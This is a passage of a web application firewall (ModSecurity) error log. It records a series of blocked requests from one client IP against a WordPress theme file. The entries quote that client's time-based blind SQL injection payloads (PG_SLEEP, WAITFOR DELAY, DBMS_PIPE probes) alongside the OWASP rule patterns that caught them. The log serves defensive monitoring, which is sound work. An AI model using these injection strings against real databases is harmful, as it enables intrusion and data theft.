[maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGUnug2jzbr_AlO3dz_QAAAMw"] [Sun Jul 07 16:19:15.243422 2024] [:error] [pid 31926:tid 139722600969984] [client 141.98.81.37:37892] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47' AND 9123=(SELECT 9123 FROM PG_SLEEP(5)) AND 'jdDE'='jdDE"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGU3ug2jzbr_AlO3dz_gAAAMg"] [Sun Jul 07 16:19:15.713551 2024] [:error] [pid 30827:tid 139722575791872] [client 141.98.81.37:37896] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47%' AND 9123=(SELECT 9123 FROM PG_SLEEP(5)) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGU0GuaLybMBNkB61uGwAAAEs"] [Sun Jul 07 16:19:16.224043 2024] [:error] [pid 30827:tid 139722634540800] [client 141.98.81.37:37898] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47 AND 9123=(SELECT 9123 FROM PG_SLEEP(5))-- beZe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGVEGuaLybMBNkB61uHAAAAEQ"] [Sun Jul 07 16:19:16.723776 2024] [:error] [pid 30828:tid 139722550613760] [client 141.98.81.37:37900] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47) WAITFOR DELAY '0:0:5' AND (5500=5500"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGVDbJWLg2ecbngu9JbgAAAI4"] [Sun Jul 07 16:19:18.067002 2024] [:error] [pid 30826:tid 139722500257536] [client 141.98.81.37:37902] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47 WAITFOR DELAY '0:0:5'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGVvcO2IzqYGkif72pNAAAABQ"] [Sun Jul 07 16:19:18.288990 2024] [:error] [pid 30826:tid 139722634540800] [client 141.98.81.37:37904] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47') WAITFOR DELAY '0:0:5' AND ('RsOu'='RsOu"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGVvcO2IzqYGkif72pNQAAAAQ"] [Sun Jul 07 16:19:18.507966 2024] [:error] [pid 30827:tid 139722550613760] [client 141.98.81.37:37906] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47' WAITFOR DELAY '0:0:5' AND 'IXPo'='IXPo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGVkGuaLybMBNkB61uHQAAAE4"] [Sun Jul 07 16:19:18.743834 2024] [:error] [pid 31926:tid 139722584184576] [client 141.98.81.37:37908] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47%' WAITFOR DELAY '0:0:5' AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGVnug2jzbr_AlO3d0AAAAAMo"] [Sun Jul 07 16:19:19.213598 2024] [:error] [pid 30828:tid 139722617755392] [client 141.98.81.37:37910] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47 WAITFOR DELAY '0:0:5'-- ajkc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGVzbJWLg2ecbngu9JbwAAAIY"] [Sun Jul 07 16:19:19.450349 2024] [:error] [pid 31926:tid 139722542221056] [client 141.98.81.37:37912] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47) AND 5584=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(105)||CHR(101)||CHR(98),5) AND (5038=5038"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGV3ug2jzbr_AlO3d0AQAAAM8"] [Sun Jul 07 16:19:19.826971 2024] [:error] [pid 31926:tid 139722475079424] [client 141.98.81.37:37914] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 5584=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(105)||CHR(101)||CHR(98),5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGV3ug2jzbr_AlO3d0AgAAANc"] [Sun Jul 07 16:19:20.294153 2024] [:error] [pid 31926:tid 139722533828352] [client 141.98.81.37:37916] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47') AND 5584=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(105)||CHR(101)||CHR(98),5) AND ('jBMe'='jBMe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGWHug2jzbr_AlO3d0AwAAANA"] [Sun Jul 07 16:19:20.696888 2024] [:error] [pid 31926:tid 139722508650240] [client 141.98.81.37:37918] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47' AND 5584=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(105)||CHR(101)||CHR(98),5) AND 'KmiL'='KmiL"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGWHug2jzbr_AlO3d0BAAAANM"] [Sun Jul 07 16:19:21.146557 2024] [:error] [pid 31926:tid 139722575791872] [client 141.98.81.37:37920] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%' AND 5584=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(105)||CHR(101)||CHR(98),5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGWXug2jzbr_AlO3d0BQAAAMs"] [Sun Jul 07 16:19:21.548121 2024] [:error] [pid 30828:tid 139722542221056] [client 141.98.81.37:37922] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 5584=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(105)||CHR(101)||CHR(98),5)-- qPZC"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGWTbJWLg2ecbngu9JcAAAAI8"] [Sun Jul 07 16:19:22.401465 2024] [:error] [pid 30828:tid 139722584184576] [client 141.98.81.37:37924] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47) ORDER BY 1-- ZDgM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGWjbJWLg2ecbngu9JcQAAAIo"] [Sun Jul 07 16:19:24.083287 2024] [:error] [pid 31926:tid 139722483472128] [client 141.98.81.37:37926] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGXHug2jzbr_AlO3d0BgAAANY"] [Sun Jul 07 16:19:24.731974 2024] [:error] [pid 30827:tid 139722475079424] [client 141.98.81.37:37928] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGXEGuaLybMBNkB61uHgAAAFc"] [Sun Jul 07 16:19:25.570271 2024] [:error] [pid 30826:tid 139722668111616] [client 141.98.81.37:37930] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGXfcO2IzqYGkif72pNgAAAAA"] [Sun Jul 07 16:19:26.580544 2024] [:error] [pid 31926:tid 139722592577280] [client 141.98.81.37:37932] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGXnug2jzbr_AlO3d0BwAAAMk"] [Sun Jul 07 16:19:27.739006 2024] [:error] [pid 31926:tid 139722500257536] [client 141.98.81.37:37934] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGX3ug2jzbr_AlO3d0CAAAANQ"] [Sun Jul 07 16:19:28.963996 2024] [:error] [pid 30828:tid 139722525435648] [client 141.98.81.37:37936] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGYDbJWLg2ecbngu9JcgAAAJE"] [Sun Jul 07 16:19:30.011466 2024] [:error] [pid 31926:tid 139722642933504] [client 141.98.81.37:37938] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGYnug2jzbr_AlO3d0CQAAAMM"] [Sun Jul 07 16:19:31.812376 2024] [:error] [pid 30826:tid 139722659718912] [client 141.98.81.37:37940] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. 